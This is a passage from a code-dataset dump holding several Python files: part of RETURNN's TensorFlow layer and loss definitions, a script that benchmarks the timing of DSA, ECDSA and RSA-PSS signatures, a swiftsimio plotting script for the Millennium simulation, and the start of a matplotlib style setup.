bidirectional=False, direction=None, input_projection=True, **kwargs):\n \"\"\"\n :param str unit: the RNNCell/etc name, e.g. \"nativelstm\". see comment below\n :param bool bidirectional: whether we should combine a forward and backward cell\n :param int|None direction: None|1 -> forward, -1 -> backward\n :param bool input_projection: True -> input is multiplied with matrix. False only works if same input dim\n :param dict[str] kwargs: passed on to base class\n \"\"\"\n super(RecLayer, self).__init__(**kwargs)\n from tensorflow.python.ops import rnn, rnn_cell\n import tensorflow.contrib.rnn as rnn_contrib\n import TFNativeOp\n from TFUtil import swapaxes, dot, sequence_mask_time_major, directed\n if unit in [\"lstmp\", \"lstm\"]:\n # Some possible LSTM implementations are:\n # * BasicLSTM, via official TF, pure TF implementation\n # * LSTMBlockFused, via tf.contrib.rnn (both CPU and GPU). should be much faster than BasicLSTM\n # * NativeLSTM, our own native LSTM (both CPU and GPU). should be faster than LSTMBlockFused\n # We default to the fastest one, i.e. NativeLSTM.\n # Note that they are currently not compatible to each other, i.e. the way the parameters are represented.\n unit = \"nativelstm\"\n if direction is not None:\n assert not bidirectional\n assert direction in [-1, 1]\n if not self._rnn_cells_dict:\n self._create_rnn_cells_dict()\n rnn_cell_class = self._rnn_cells_dict[unit.lower()]\n with tf.variable_scope(\n \"rec\",\n initializer=tf.contrib.layers.xavier_initializer(\n seed=self.network.random.randint(2**31))) as scope:\n assert isinstance(scope, tf.VariableScope)\n scope_name_prefix = scope.name + \"/\" # e.g. \"layer1/rec/\"\n n_hidden = self.output.dim\n if bidirectional:\n assert n_hidden % 2 == 0\n n_hidden //= 2\n cell_fw = rnn_cell_class(n_hidden)\n assert isinstance(cell_fw, (rnn_cell.RNNCell, rnn_contrib.FusedRNNCell, TFNativeOp.RecSeqCellOp)) # e.g. BasicLSTMCell\n if bidirectional:\n cell_bw = rnn_cell_class(n_hidden)\n else:\n cell_bw = None\n x = self.input_data.placeholder # (batch,time,dim) or (time,batch,dim)\n if not self.input_data.is_time_major:\n assert self.input_data.batch_dim_axis == 0\n assert self.input_data.time_dim_axis == 1\n x = swapaxes(x, 0, 1) # (time,batch,[dim])\n seq_len = self.input_data.size_placeholder[0]\n if isinstance(cell_fw, (rnn_cell.RNNCell, rnn_contrib.FusedRNNCell)):\n assert not self.input_data.sparse\n assert input_projection\n if direction == -1:\n x = tf.reverse_sequence(x, seq_lengths=seq_len, batch_dim=1, seq_dim=0)\n if isinstance(cell_fw, rnn_cell.RNNCell): # e.g. BasicLSTMCell\n if bidirectional:\n # Will get (time,batch,ydim/2).\n (y_fw, y_bw), _ = rnn.bidirectional_dynamic_rnn(\n cell_fw=cell_fw, cell_bw=cell_bw,\n inputs=x, time_major=True, sequence_length=seq_len,\n dtype=tf.float32)\n y = tf.concat(2, (y_fw, y_bw)) # (time,batch,ydim)\n else:\n # Will get (time,batch,ydim).\n y, _ = rnn.dynamic_rnn(cell=cell_fw, inputs=x, time_major=True, sequence_length=seq_len, dtype=tf.float32)\n elif isinstance(cell_fw, rnn_contrib.FusedRNNCell): # e.g. LSTMBlockFusedCell\n if bidirectional:\n raise NotImplementedError\n # Will get (time,batch,ydim).\n y, _ = cell_fw(inputs=x, sequence_length=seq_len, dtype=tf.float32)\n else:\n raise Exception(\"invalid type: %s\" % type(cell_fw))\n if direction == -1:\n y = tf.reverse_sequence(y, seq_lengths=seq_len, batch_dim=1, seq_dim=0)\n elif isinstance(cell_fw, TFNativeOp.RecSeqCellOp):\n assert not bidirectional\n if input_projection:\n W = tf.get_variable(name=\"W\", shape=(self.input_data.dim, cell_fw.n_input_dim), dtype=tf.float32)\n if self.input_data.sparse:\n x = tf.nn.embedding_lookup(W, x)\n else:\n x = dot(x, W)\n else:\n assert not self.input_data.sparse\n assert self.input_data.dim == cell_fw.n_input_dim\n b = tf.get_variable(name=\"b\", shape=(cell_fw.n_input_dim,), dtype=tf.float32, initializer=tf.constant_initializer(0.0))\n x += b\n index = sequence_mask_time_major(seq_len, maxlen=tf.shape(x)[0])\n y = cell_fw(inputs=directed(x, direction), index=directed(index, direction))\n y = directed(y, direction)\n else:\n raise Exception(\"invalid type: %s\" % type(cell_fw))\n self.output.time_dim_axis = 0\n self.output.batch_dim_axis = 1\n self.output.placeholder = y\n params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope_name_prefix)\n assert params\n self.params.update({p.name[len(scope_name_prefix):-2]: p for p in params})\n\n\nclass FsaLayer(LayerBase):\n layer_class = \"fsa\"\n\n def __init__(self, **kwargs):\n \"\"\"\n \"\"\"\n super(FsaLayer, self).__init__(**kwargs)\n # TODO...\n\n\nclass CombineLayer(LayerBase):\n layer_class = \"combine\"\n\n # All ops require the same input shape and yield the same output shape. (For now)\n @classmethod\n def _op_kind_average(cls, sources):\n \"\"\"\n :param list[LayerBase] sources:\n :rtype: tf.Tensor\n \"\"\"\n x = sources[0].output.placeholder\n for source in sources[1:]:\n x += source.output.placeholder\n x /= len(sources)\n return x\n\n def __init__(self, kind, sources, **kwargs):\n \"\"\"\n :param str kind:\n :param list[LayerBase] sources:\n \"\"\"\n assert sources\n kwargs = kwargs.copy()\n if \"n_out\" not in kwargs and \"out_type\" not in kwargs:\n kwargs[\"out_type\"] = sources[0].output.get_kwargs()\n kwargs[\"out_type\"][\"name\"] = \"%s_output\" % kwargs[\"name\"]\n super(CombineLayer, self).__init__(sources=sources, **kwargs)\n assert not self.output.sparse\n for source in sources:\n assert source.output.shape == self.output.shape\n assert source.output.batch_dim_axis == self.output.batch_dim_axis\n assert source.output.time_dim_axis == self.output.time_dim_axis\n op = getattr(self, \"_op_kind_%s\" % kind)\n self.output.placeholder = op(sources)\n\n\nclass FramewiseStatisticsLayer(LayerBase):\n layer_class = \"framewise_statistics\"\n\n def __init__(self, sil_label_idx, histogram_num_bins=20, **kwargs):\n # n_out=1 is a workaround for now. Our output should not be used. We have none.\n super(FramewiseStatisticsLayer, self).__init__(n_out=1, **kwargs)\n self.output.placeholder = tf.constant(0, name=\"dummy\")\n assert self.sources, \"give me some sources\"\n # Currently, a bit hardcoded.\n # We expect a framewise hard alignment, and calculate FER, CE, perplexity,\n # for all frames, frames without silence, and silence frames.\n from TFUtil import flatten_with_seq_len_mask\n import numpy\n source = self.sources[0]\n output = source.output\n target = source._get_target_value()\n assert target.sparse\n assert source.output_before_activation.act_func is tf.nn.softmax\n output_seq_lens = output.size_placeholder[0]\n output_before_softmax_flat = flatten_with_seq_len_mask(source.output_before_activation.x, output_seq_lens, time_major=output.is_time_major)\n target_seq_lens = target.size_placeholder[0]\n target_flat = flatten_with_seq_len_mask(target.placeholder, target_seq_lens, time_major=target.is_time_major)\n target_flat.set_shape(tf.TensorShape([tf.Dimension(None)]))\n loss_ce = tf.nn.sparse_softmax_cross_entropy_with_logits(output_before_softmax_flat, target_flat)\n flat_last_dim = output_before_softmax_flat.get_shape().ndims - 1\n assert flat_last_dim == 1\n output_flat = flatten_with_seq_len_mask(output.placeholder, output_seq_lens, time_major=output.is_time_major)\n output_flat_argmax = tf.cast(tf.arg_max(output_before_softmax_flat, dimension=flat_last_dim), \"int32\")\n frame_error = tf.not_equal(output_flat_argmax, target_flat)\n # target_flat is shape (time,) -> index.\n target_flat_exp = tf.pack([tf.range(tf.shape(target_flat)[0], dtype=tf.int32), target_flat], axis=1)\n true_label_prob = tf.gather_nd(output_flat, target_flat_exp)\n true_label_prob.set_shape(tf.TensorShape([tf.Dimension(None)]))\n true_label_prob_i32 = tf.clip_by_value(\n tf.cast(tf.round(true_label_prob * histogram_num_bins), tf.int32), 0, histogram_num_bins - 1)\n true_label_prob_histogram = tf.stack(\n [tf.equal(true_label_prob_i32, i) for i in range(histogram_num_bins)], axis=1)\n true_label_prob_histogram.set_shape(tf.TensorShape([tf.Dimension(None), tf.Dimension(histogram_num_bins)]))\n\n mask_no_sil = tf.not_equal(target_flat, sil_label_idx)\n mask_sil = tf.equal(target_flat, sil_label_idx)\n seq_len = tf.reduce_sum(target_seq_lens)\n seq_len_sil = tf.reduce_sum(tf.cast(mask_sil, tf.int32))\n seq_len_no_sil = tf.reduce_sum(tf.cast(mask_no_sil, tf.int32))\n\n accumulated_seq_len = tf.Variable(initial_value=0, dtype=tf.int64, trainable=False, name=\"accumulated_seq_len\")\n accumulated_seq_len_sil = tf.Variable(initial_value=0, dtype=tf.int64, trainable=False, name=\"accumulated_seq_len_sil\")\n accumulated_seq_len = tf.assign_add(accumulated_seq_len, tf.cast(seq_len, tf.int64))\n accumulated_seq_len_sil = tf.assign_add(accumulated_seq_len_sil, tf.cast(seq_len_sil, tf.int64))\n accumulated_seq_len_no_sil = accumulated_seq_len - accumulated_seq_len_sil\n\n self.stats[\"batch_seq_length\"] = seq_len\n self.stats[\"batch_seq_length_sil\"] = seq_len_sil\n self.stats[\"batch_seq_length_no_sil\"] = seq_len_no_sil\n self.stats[\"accumulated_seq_length\"] = accumulated_seq_len\n self.stats[\"accumulated_seq_length_sil\"] = accumulated_seq_len_sil\n self.stats[\"accumulated_seq_length_no_sil\"] = accumulated_seq_len_no_sil\n\n for _k, _v in {\n \"loss_ce\": loss_ce,\n \"frame_error\": frame_error,\n \"true_label_prob_histogram\": true_label_prob_histogram}.items():\n for _k2 in [\"\", \"_sil\", \"_no_sil\"]:\n k = _k + _k2\n v = _v\n acc_seq_len = accumulated_seq_len\n if k.endswith(\"_no_sil\"):\n v = tf.boolean_mask(v, mask_no_sil)\n acc_seq_len = accumulated_seq_len_no_sil\n elif k.endswith(\"_sil\"):\n v = tf.boolean_mask(v, mask_sil)\n acc_seq_len = accumulated_seq_len_sil\n v_f32 = tf.cast(v, tf.float32)\n self.stats[\"batch_%s\" % k] = tf.reduce_mean(v_f32, axis=0)\n if v.dtype.is_floating:\n acc_dtype = \"float64\"\n else:\n acc_dtype = \"int64\"\n acc_shape = v.get_shape().as_list()[1:]\n assert all(acc_shape)\n acc_v = tf.Variable(initial_value=numpy.zeros(acc_shape, dtype=acc_dtype), dtype=acc_dtype, trainable=False, name=\"accumulated_%s\" % k)\n acc_v = tf.assign_add(acc_v, tf.reduce_sum(tf.cast(v, acc_dtype), axis=0))\n self.stats[\"accumulated_%s\" % k] = tf.cast(acc_v, tf.float64) / tf.cast(acc_seq_len, tf.float64)\n\n self.stats[\"batch_loss_perplexity\"] = tf.exp(self.stats[\"batch_loss_ce\"])\n self.stats[\"batch_loss_perplexity_sil\"] = tf.exp(self.stats[\"batch_loss_ce_sil\"])\n self.stats[\"batch_loss_perplexity_no_sil\"] = tf.exp(self.stats[\"batch_loss_ce_no_sil\"])\n self.stats[\"accumulated_loss_perplexity\"] = tf.exp(self.stats[\"accumulated_loss_ce\"])\n self.stats[\"accumulated_loss_perplexity_sil\"] = tf.exp(self.stats[\"accumulated_loss_ce_sil\"])\n self.stats[\"accumulated_loss_perplexity_no_sil\"] = tf.exp(self.stats[\"accumulated_loss_ce_no_sil\"])\n\n\nclass Loss(object):\n class_name = None\n recurrent = False # if this is a frame-wise criteria, this will be False\n\n def __init__(self):\n # All are initialized in self.init().\n self.output = None # type: Data\n self.time_major = None # type: bool|None\n self.output_with_activation = None # type: OutputWithActivation\n self.output_seq_lens = None # type: tf.Tensor\n self.target = None # type: Data\n self.target_seq_lens = None # type: tf.Tensor\n self.output_flat = None # type: tf.Tensor\n self.output_before_softmax_flat = None # type: tf.Tensor\n self.target_flat = None # type: tf.Tensor\n # Maybe make configurable. For now, same as in our Theano behavior.\n self.reduce_func = tf.reduce_sum # or tf.reduce_mean\n\n def init(self, output, output_with_activation=None, target=None):\n \"\"\"\n :param Data output: generated output\n :param OutputWithActivation|None output_with_activation:\n :param Data target: reference target from dataset\n \"\"\"\n from TFUtil import flatten_with_seq_len_mask\n with tf.name_scope(\"loss_init\"):\n self.output = output\n self.output_with_activation = output_with_activation\n self.output_seq_lens = output.size_placeholder[0]\n self.target = target\n self.target_seq_lens = target.size_placeholder[0]\n # Flat variants are with batch,time collapsed into one, masked via seq_lens.\n self.output_flat = None\n self.output_before_softmax_flat = None\n if output_with_activation:\n assert output_with_activation.y is output.placeholder\n if output_with_activation and output_with_activation.act_func is tf.nn.softmax:\n self.output_before_softmax_flat = flatten_with_seq_len_mask(output_with_activation.x, self.output_seq_lens, time_major=output.is_time_major)\n else:\n self.output_flat = flatten_with_seq_len_mask(output.placeholder, self.output_seq_lens, time_major=output.is_time_major)\n self.target_flat = flatten_with_seq_len_mask(target.placeholder, self.target_seq_lens, time_major=target.is_time_major)\n\n def get_error(self):\n \"\"\"\n :return: frame error rate as a scalar value\n :rtype: tf.Tensor\n \"\"\"\n with tf.name_scope(\"loss_frame_error\"):\n from TFUtil import check_input_ndim, check_shape_equal\n output_flat = self.output_before_softmax_flat\n if output_flat is None:\n output_flat = self.output_flat\n output_flat = check_input_ndim(output_flat, ndim=2)\n last_dim = tf.rank(output_flat) - 1 # should be 1\n output_label = tf.cast(tf.arg_max(output_flat, dimension=last_dim), \"int32\")\n if self.target.sparse:\n target_label = check_input_ndim(self.target_flat, ndim=1)\n else:\n target_flat = check_shape_equal(self.target_flat, output_flat)\n target_label = tf.cast(tf.arg_max(target_flat, dimension=last_dim), \"int32\")\n not_equal = tf.not_equal(output_label, target_label)\n return self.reduce_func(tf.cast(not_equal, \"float32\"))\n\n def get_value(self):\n \"\"\"\n :return: loss as a scalar value\n :rtype: tf.Tensor\n \"\"\"\n raise NotImplementedError\n\n def get_auto_output_layer_dim(self, target_dim):\n \"\"\"\n :param int target_dim:\n :return: normally just the same as target_dim. e.g. for CTC, we would add 1 for the blank label\n :rtype: int\n \"\"\"\n return target_dim\n\n\nclass CrossEntropyLoss(Loss):\n class_name = \"ce\"\n\n def get_value(self):\n with tf.name_scope(\"loss_ce\"):\n if self.target.sparse:\n if self.output_before_softmax_flat is not None:\n out = tf.nn.sparse_softmax_cross_entropy_with_logits(self.output_before_softmax_flat, self.target_flat)\n return self.reduce_func(out)\n else:\n target_flat_exp = tf.pack([tf.range(tf.shape(self.target_flat)[0], dtype=tf.int32), self.target_flat], axis=1) # (time,2)\n out = tf.log(tf.gather_nd(self.output_flat, target_flat_exp))\n return -self.reduce_func(out)\n else: # not sparse\n if self.output_before_softmax_flat is not None:\n out = tf.nn.softmax_cross_entropy_with_logits(self.output_before_softmax_flat, self.target_flat)\n return self.reduce_func(out)\n else:\n out = self.target_flat * tf.log(self.output_flat)\n return -self.reduce_func(out)\n\n\nclass GenericCELoss(Loss):\n class_name = \"generic_ce\"\n\n def __init__(self, **kwargs):\n super(GenericCELoss, self).__init__(**kwargs)\n\n def loss(z, y, grad_f, target):\n nlog_scores = -tf.log(tf.clip_by_value(y, 1.e-20, 1.e20)) # (time,dim)\n # target is shape (time,) -> index.\n target_exp = tf.pack([tf.range(tf.shape(target)[0], dtype=tf.int32), target], axis=1) # (time,2)\n # Thus K == 2. gather_nd out will be (target_exp.shape[0],) = (time,).\n gathered = tf.gather_nd(nlog_scores, target_exp) # (time,)\n return self.reduce_func(gathered)\n\n def loss_grad(op, grad):\n \"\"\"\n :param tf.Operation op:\n :param tf.Tensor grad: grad for loss\n :return: grad for op.inputs\n \"\"\"\n z, y, grad_f, target = op.inputs\n num_classes = tf.shape(z)[-1]\n bw = tf.one_hot(target, depth=num_classes)\n grad_z = grad_f * (y - bw)\n return grad_z, None, None, None # for each input\n\n # We need to create the loss func here in __init__ to register it in the default graph as early as possible,\n # before we create the TF session.\n from TFUtil import custom_gradient\n self._loss_func = custom_gradient.register(\n [tf.float32, tf.float32, tf.float32, tf.int32], op=loss, grad_op=loss_grad)\n\n def get_value(self):\n # Should be generic for any activation function.\n # (Except when the labels are not independent, such as for softmax.)\n # See Theano NetworkOutputLayer.FramewiseOutputLayer.cost() with \"generic_ce\" loss.\n from TFUtil import flatten_with_seq_len_mask\n # activation function can be anything, e.g. exp or sigmoid, but not softmax, must be elemwise.\n assert self.output_with_activation\n x = self.output_with_activation.x\n y = self.output_with_activation.y\n grad_f, = tf.gradients(tf.log(y), x)\n assert grad_f is not None\n grad_f = flatten_with_seq_len_mask(grad_f, seq_lens=self.output_seq_lens, time_major=self.output.is_time_major)\n x = flatten_with_seq_len_mask(x, seq_lens=self.output_seq_lens, time_major=self.output.is_time_major)\n y = flatten_with_seq_len_mask(y, seq_lens=self.output_seq_lens, time_major=self.output.is_time_major)\n assert y.get_shape().ndims == 2\n y /= tf.reduce_sum(y, axis=1, keep_dims=True)\n assert self.output.dim == self.target.dim\n assert self.target.sparse\n return self._loss_func(x, y, grad_f, self.target_flat)\n\n\nclass CtcLoss(Loss):\n class_name = \"ctc\"\n recurrent = True\n\n def __init__(self, target_collapse_repeated=False, auto_clip_target_len=False):\n \"\"\"\n :param bool target_collapse_repeated: like preprocess_collapse_repeated option for CTC. used for sparse_labels().\n :param bool auto_clip_target_len: see self._get_target_sparse_labels().\n \"\"\"\n super(CtcLoss, self).__init__()\n self.target_collapse_repeated = target_collapse_repeated\n self.auto_clip_target_len = auto_clip_target_len\n self._target_sparse_labels = None\n\n def init(self, **kwargs):\n self._target_sparse_labels = None\n super(CtcLoss, self).init(**kwargs)\n\n def _get_target_sparse_labels(self):\n if self._target_sparse_labels is not None:\n return self._target_sparse_labels\n from TFUtil import sparse_labels\n target_seq_lens = self.target_seq_lens\n if self.auto_clip_target_len:\n # Not more than output_seq_lens, otherwise we can get an exception by the CTC algorithm\n # \"Not enough time for target transition sequence\".\n # One less to allow for at least one blank somewhere.\n target_seq_lens = tf.minimum(target_seq_lens, tf.maximum(self.output_seq_lens - 1, 0))\n labels = sparse_labels(self.target.placeholder, target_seq_lens,\n collapse_repeated=self.target_collapse_repeated)\n self._target_sparse_labels = labels\n return labels\n\n def get_value(self):\n if not self.target.sparse:\n raise Exception(\"CTC target expected to be sparse (symbols)\")\n with tf.name_scope(\"loss_ctc\"):\n logits = self.output_with_activation\n if self.output_with_activation:\n logits = self.output_with_activation.get_logits()\n if logits is None:\n logits = tf.log(self.output.placeholder)\n assert logits.get_shape().ndims == 3 # (B,T,N) or (T,B,N)\n assert logits.get_shape().dims[2].value == self.target.dim + 1 # one more for blank\n seq_lens = self.output_seq_lens\n labels = self._get_target_sparse_labels()\n loss = tf.nn.ctc_loss(inputs=logits, labels=labels, sequence_length=seq_lens, time_major=self.output.is_time_major)\n return self.reduce_func(loss)\n\n def get_error(self):\n if not self.target.sparse:\n raise Exception(\"CTC target expected to be sparse (symbols)\")\n with tf.name_scope(\"loss_ctc_error\"):\n logits = None\n if self.output_with_activation:\n logits = self.output_with_activation.get_logits()\n if logits is None:\n logits = tf.log(self.output.placeholder)\n if not self.output.is_time_major:\n logits = tf.transpose(logits, [1, 0, 2]) # (B,T,N) => (T,B,N)\n seq_lens = self.output_seq_lens\n decoded, _ = tf.nn.ctc_greedy_decoder(inputs=logits, sequence_length=seq_lens)\n labels = self._get_target_sparse_labels()\n error = tf.edit_distance(hypothesis=tf.cast(decoded[0], labels.dtype), truth=labels, normalize=False)\n return self.reduce_func(error)\n\n def get_auto_output_layer_dim(self, target_dim):\n return target_dim + 1 # one added for blank\n\n\n_LossClassDict = {} # type: dict[str,type(Loss)]\n\ndef get_loss_class(loss):\n \"\"\"\n :param str loss: loss type such as \"ce\"\n :rtype: () -> Loss\n \"\"\"\n if not _LossClassDict:\n for v in globals().values():\n if isinstance(v, type) and issubclass(v, Loss) and v.class_name:\n assert v.class_name not in _LossClassDict\n _LossClassDict[v.class_name] = v\n return _LossClassDict[loss]\n\n\n_LayerClassDict = {} # type: dict[str,type(LayerBase)]\n\ndef _init_layer_class_dict():\n for v in globals().values():\n if isinstance(v, type) and issubclass(v, LayerBase) and v.layer_class:\n assert v.layer_class not in _LayerClassDict\n _LayerClassDict[v.layer_class] = v\n for alias, v in {\"forward\": LinearLayer}.items():\n assert alias not in _LayerClassDict\n _LayerClassDict[alias] = v\n\n\ndef get_layer_class(name):\n \"\"\"\n :param str name: matches layer_class\n :rtype: () -> LayerBase\n \"\"\"\n if not _LayerClassDict:\n _init_layer_class_dict()\n if name not in _LayerClassDict:\n raise Exception(\"unknown layer class %r\" % name)\n return _LayerClassDict[name]\n\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/rwth-i6_returnn/returnn-master/TFNetworkLayer.py","file_name":"TFNetworkLayer.py","file_ext":"py","file_size_in_byte":37936,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"30079499783","text":"import time\nfrom Crypto.Hash import SHA\nfrom Crypto.Hash import SHA256\nfrom Crypto.Hash import SHA3_256\nfrom Crypto.Hash import SHA384\nfrom Crypto.Signature import DSS\nfrom Crypto.PublicKey import ECC\nfrom Crypto.PublicKey import DSA\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Signature import PKCS1_PSS\nfrom Crypto.Cipher import PKCS1_OAEP\nfrom Crypto.Signature import pss\nfrom Crypto import Random\n\ndef DSA_sign(key, h):\n signer = DSS.new(key, 'deterministic-rfc6979')\n return signer.sign(h)\n\ndef DSA_verify(sign, key, h):\n try:\n verifier = DSS.new(key, 'deterministic-rfc6979')\n verifier.verify(h, sign)\n except ValueError:\n print ('The message is not authentic')\n\ndef hashed_message(hash_type, message):\n if hash_type =='SHA-1':\n h = SHA.new(bytes(message, 'utf-8'))\n elif hash_type =='SHA-224':\n h = SHA256.new(bytes(message, 'utf-8'))\n elif hash_type =='SHA-256':\n h = SHA256.new(bytes(message, 'utf-8'))\n elif hash_type =='SHA-384':\n h = SHA384.new(bytes(message, 'utf-8'))\n else:\n h = SHA256.new(bytes(message, 'utf-8'))\n\n return h\n\n \ndef DSA_times(tests_information):\n key_param = [line.strip('\\n') for line in open(\"dsa_key_params.txt\")]\n p=int(key_param[0], 16)\n q=int(key_param[1], 16)\n g=int(key_param[2], 16)\n x=int(key_param[3], 16)\n y=int(key_param[4], 16)\n\n key= DSA.construct([y, g, p, q, x]) #Construccion de la llave\n sign_times = []\n verify_times = []\n print(key)\n for t in tests_information:\n [hash_type, message] = t.split(',')\n h = hashed_message(hash_type, message)\n \n #sign\n start_time = time.perf_counter()\n sign = DSA_sign(key, h)\n elapsed_time = time.perf_counter() - start_time\n sign_times.append(elapsed_time)\n \n #verification\n start_time = time.perf_counter()\n DSA_verify(sign, key, h)\n elapsed_time = time.perf_counter() - start_time\n verify_times.append(elapsed_time)\n\n return [sign_times, verify_times]\n\n\ndef ECDSA_sign(key, h):\n signer = DSS.new(key, 'deterministic-rfc6979')\n return signer.sign(h)\n\ndef ECDSA_verify(sign, key, h):\n try:\n verifier = DSS.new(key, 'deterministic-rfc6979')\n verifier.verify(h, sign)\n except ValueError:\n print ('The message is not authentic')\n\n \ndef ECDSA_times(tests_information):\n key_params = [line.strip('\\n') for line in open(\"ECDSA_key_params.txt\")]\n q=int(key_params[0], 16)\n x=int(key_params[1], 16)\n ux=int(key_params[2], 16)\n uy=int(key_params[3], 16)\n key=ECC.construct(curve='NIST P-521', d=x, point_x=ux, point_y=uy)\n sign_times = []\n verify_times = []\n for t in tests_information:\n [hash_type, message] = t.split(',')\n h = hashed_message(hash_type, message)\n\n \n #sign\n start_time = time.perf_counter()\n sign = ECDSA_sign(key, h)\n elapsed_time = time.perf_counter() - start_time\n sign_times.append(elapsed_time)\n \n #verification\n start_time = time.perf_counter()\n ECDSA_verify(sign, key, h)\n elapsed_time = time.perf_counter() - start_time\n verify_times.append(elapsed_time)\n\n return [sign_times, verify_times]\n\n\n\ndef RSA_PSS_sign(key, message):\n h = SHA256.new(message)\n signer = pss.new(key)\n return signer.sign(h)\n\ndef RSA_PSS_verify(message, key, sign):\n try:\n h = SHA256.new(message)\n verifier = pss.new(key)\n verifier.verify(h, sign) \n except ValueError:\n print ('The message is not authentic')\n\ndef RSA_PSS_times():\n sign_times = []\n verify_times = []\n for i in range(0, 11):\n message = Random.get_random_bytes(64)\n key = RSA.generate(1024) \n # To sign\n start_time = time.perf_counter()\n sign = RSA_PSS_sign(key, message)\n elapsed_time = time.perf_counter() - start_time\n sign_times.append(elapsed_time)\n\n\n # To verify\n start_time = time.perf_counter()\n RSA_PSS_verify(message, key, sign)\n elapsed_time = time.perf_counter() - start_time\n\n verify_times.append(elapsed_time)\n\n return [verify_times, sign_times]\n\ndef print_cipher_times(DSA, ECDSA, RSA_PSS):\n number_of_vectors = len(DSA)\n DSA_total_time = 0\n ECDSA_total_time = 0\n RSA_PSS_total_time = 0\n\n print('\\n\\t#------------------------------------------------------------------------------------------------------#')\n print('\\t| FIRMA |') \n print('\\t#------------------------------------------------------------------------------------------------------#')\n print('\\t| No. Vector | DSA | ECDSA | RSA_PSS |')\n print('\\t#------------------------------------------------------------------------------------------------------#')\n for t in range(number_of_vectors):\n print('\\t| vector ',t ,' |\\t {:0.6f} |\\t {:0.6f} |\\t {:0.6f} |'.format(DSA[t], ECDSA[t],RSA_PSS[t]))\n print('\\t#------------------------------------------------------------------------------------------------------#')\n DSA_total_time += DSA[t]\n ECDSA_total_time += ECDSA[t]\n RSA_PSS_total_time += RSA_PSS[t]\n\n print('\\t| Promedio |\\t {:0.6f} |\\t {:0.6f} |\\t {:0.6f} |'.format(DSA_total_time/number_of_vectors, ECDSA_total_time/number_of_vectors,RSA_PSS_total_time/number_of_vectors))\n print('\\t#------------------------------------------------------------------------------------------------------#\\n')\n\ndef print_descipher_times(DSA, ECDSA, RSA_PSS):\n number_of_vectors = len(DSA)\n DSA_total_time = 0\n ECDSA_total_time = 0\n RSA_PSS_total_time = 0\n\n print('\\n\\t#------------------------------------------------------------------------------------------------------#')\n print('\\t| Verificación |') \n print('\\t#------------------------------------------------------------------------------------------------------#')\n print('\\t| No. Vector | DSA | ECDSA | RSA_PSS |')\n print('\\t#------------------------------------------------------------------------------------------------------#')\n for t in range(number_of_vectors):\n print('\\t| vector ',t ,' |\\t {:0.6f} |\\t {:0.6f} |\\t {:0.6f} |'.format(DSA[t], ECDSA[t],RSA_PSS[t]))\n print('\\t#------------------------------------------------------------------------------------------------------#')\n DSA_total_time += DSA[t]\n ECDSA_total_time += ECDSA[t]\n RSA_PSS_total_time += RSA_PSS[t]\n\n print('\\t| Promedio |\\t {:0.6f} |\\t {:0.6f} |\\t {:0.6f} |'.format(DSA_total_time/number_of_vectors, ECDSA_total_time/number_of_vectors,RSA_PSS_total_time/number_of_vectors))\n print('\\t#------------------------------------------------------------------------------------------------------#\\n')\n\ndef compare_signature_algorithms():\n tests_information = [line.strip('\\n') for line in open(\"signature_vectors.txt\" )]\n [sign_ECDSA_times, verify_ECDSA_times] = ECDSA_times(tests_information)\n [sign_DSA_times, verify_DSA_times] = ECDSA_times(tests_information)\n [sign_RSA_PSS_rimes, verify_RSA_PSS_times] = RSA_PSS_times()\n print_cipher_times(sign_DSA_times, sign_ECDSA_times, sign_RSA_PSS_rimes)\n print_descipher_times(verify_DSA_times, verify_ECDSA_times, verify_RSA_PSS_times)\n\n\n","repo_name":"bemesa21/cryptography_project","sub_path":"signature_algorithms.py","file_name":"signature_algorithms.py","file_ext":"py","file_size_in_byte":7888,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"5928994344","text":"#!/bin/env python\n#\n# Read in and plot part of the Millennium simulation\n# from the HDF5 wrapped snapshot using swiftsimio.\n#\n\nimport matplotlib.pyplot as plt\nimport swiftsimio as sw\n\nmask = sw.mask(\"snap_millennium_063.hdf5\")\n\n# Choose region to read (in terms of the boxsize to get the units right)\nb = mask.metadata.boxsize[0]\nload_region=((0*b,.1*b),(0*b,.1*b),(0*b,.1*b))\n\n# Seelct the region\nmask.constrain_spatial(load_region)\ndata = sw.load(\"snap_millennium_063.hdf5\", mask=mask)\n\n# Read particle positions\npos = data.dark_matter.coordinates\nmass = data.dark_matter.masses\n\n# Generate smoothing lengths for the dark matter\nfrom swiftsimio.visualisation.smoothing_length_generation import generate_smoothing_lengths\ndata.dark_matter.smoothing_length = generate_smoothing_lengths(\n data.dark_matter.coordinates,\n data.metadata.boxsize,\n kernel_gamma=1.8,\n neighbours=57,\n speedup_fac=2,\n dimension=3,\n)\n\n# Project the dark matter mass\nfrom swiftsimio.visualisation.projection import project_pixel_grid\ndm_mass = project_pixel_grid(\n # Note here that we pass in the dark matter dataset not the whole\n # data object, to specify what particle type we wish to visualise\n data=data.dark_matter,\n boxsize=0.1*data.metadata.boxsize,\n resolution=1024,\n project=\"masses\",\n parallel=True,\n region=None\n)\n\nfrom matplotlib.pyplot import imshow\nfrom matplotlib.colors import LogNorm\nplt.figure(figsize=(8,8))\nimshow(LogNorm()(dm_mass).T, cmap=\"inferno\", origin=\"lower\",\n extent=(load_region[0][0], load_region[0][1], load_region[1][0], load_region[1][1]))\nplt.xlabel(\"x [Mpc/h]\")\nplt.ylabel(\"y [Mpc/h]\")\nplt.gca().set_aspect(\"equal\")\nplt.title(\"Millennium simulation, z=0\")\nplt.savefig(\"wrapped_millennium.png\")\n","repo_name":"jchelly/DFED-MetadataWrapper","sub_path":"examples/read_wrapped_millennium.py","file_name":"read_wrapped_millennium.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71158866933","text":"import matplotlib.pyplot as plt\nimport geopandas as gpd\nfrom src.const import order\nfrom shapely.geometry import LineString\nimport matplotlib as mpl\n\nmpl.rcParams['pdf.fonttype'] = 42\nmpl.rcParams['ps.fonttype'] = 42\nmpl.rcParams['font.family'] = 'Times New Roman'\nmpl.rcParams['font.size'] = 10\nmpl.rcParams['axes.unicode_minus'] = False\nmpl.rcParams['mathtext.fontset'] = 'custom'\nmpl.rcParams['mathtext.rm'] = 'Times New Roman'\nmpl.rcParams['mathtext.it'] = 'Times New 